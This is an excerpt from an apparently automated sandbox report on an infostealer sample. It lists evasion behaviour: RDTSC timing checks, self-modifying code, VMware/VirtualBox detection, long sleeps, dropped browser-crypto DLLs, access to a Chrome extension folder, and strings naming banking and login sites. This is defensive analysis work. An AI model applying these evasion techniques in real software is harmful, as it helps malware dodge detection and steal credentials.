Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 509217 second address: 50923F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F47311907B0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F47311907B2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 5093E3 second address: 5093FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 jmp 00007F473118FE63h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 50B882 second address: 50B886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 50B93B second address: 50B941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 50B941 second address: 50B945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe RDTSC instruction interceptor: First address: 50B945 second address: 50B953 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Special instruction interceptor: First address: CEC72A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Special instruction interceptor: First address: CEC7FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Special instruction interceptor: First address: E90B11 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Special instruction interceptor: First address: EB7C78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 38C72A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 38C7FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 530B11 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Special instruction interceptor: First address: 557C78 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Code function: 7_2_05130BD8 rdtsc 7_2_05130BD8
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 7822 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 2178 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: foregroundWindowGot 357 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1628 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 2105 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 361 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1873 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window / User API: threadDelayed 1246 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\tAa6xNsucX.exe API coverage: 0.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\tAa6xNsucX.exe TID: 6584 Thread sleep count: 153 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 1960 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 1960 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6204 Thread sleep count: 51 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6204 Thread sleep time: -102051s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5008 Thread sleep count: 1628 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5008 Thread sleep time: -3257628s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5448 Thread sleep count: 2105 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5448 Thread sleep time: -4212105s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 4120 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 4120 Thread sleep time: -94047s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6104 Thread sleep count: 361 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6104 Thread sleep time: -10830000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 7216 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6024 Thread sleep count: 1873 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 6024 Thread sleep time: -3747873s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 1644 Thread sleep count: 54 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 1644 Thread sleep time: -108054s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5008 Thread sleep count: 1246 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe TID: 5008 Thread sleep time: -2493246s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C32C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C32C930
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: DGDBFBFC.0.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: DGDBFBFC.0.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: vmware
Source: DGDBFBFC.0.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: explortu.exe, 00000009.00000002.4583229120.0000000000D01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW']
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: DGDBFBFC.0.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explortu.exe, explortu.exe, 0000000D.00000002.2729952140.0000000000511000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000E.00000002.3332519871.0000000000511000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000F.00000002.3931868304.0000000000511000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 00000010.00000002.4529629010.0000000000511000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: DGDBFBFC.0.dr Binary or memory string: discord.comVMware20,11696428655f
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: DGDBFBFC.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: DGDBFBFC.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: DGDBFBFC.0.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.5.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: DGDBFBFC.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: DGDBFBFC.0.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: DGDBFBFC.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: DGDBFBFC.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin`
Source: DGDBFBFC.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.5.dr Binary or memory string: \driver\vmci,\driver\pci
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ~VirtualMachineTypes
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: DGDBFBFC.0.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: DGDBFBFC.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: HIIEBAFCBK.exe, 00000007.00000002.2374677774.0000000000E71000.00000040.00000001.01000000.00000009.sdmp, explortu.exe, 00000009.00000002.4582406469.0000000000511000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000A.00000002.2423502707.0000000000511000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000D.00000002.2729952140.0000000000511000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000E.00000002.3332519871.0000000000511000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 0000000F.00000002.3931868304.0000000000511000.00000040.00000001.01000000.0000000D.sdmp, explortu.exe, 00000010.00000002.4529629010.0000000000511000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: DGDBFBFC.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: DGDBFBFC.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: DGDBFBFC.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: DGDBFBFC.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000082A000.00000004.00000020.00020000.00000000.sdmp, tAa6xNsucX.exe, 00000000.00000002.2304071459.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, explortu.exe, 00000009.00000002.4583229120.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, explortu.exe, 00000009.00000002.4583229120.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: DGDBFBFC.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tAa6xNsucX.exe, tAa6xNsucX.exe, 00000000.00000002.2305011823.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
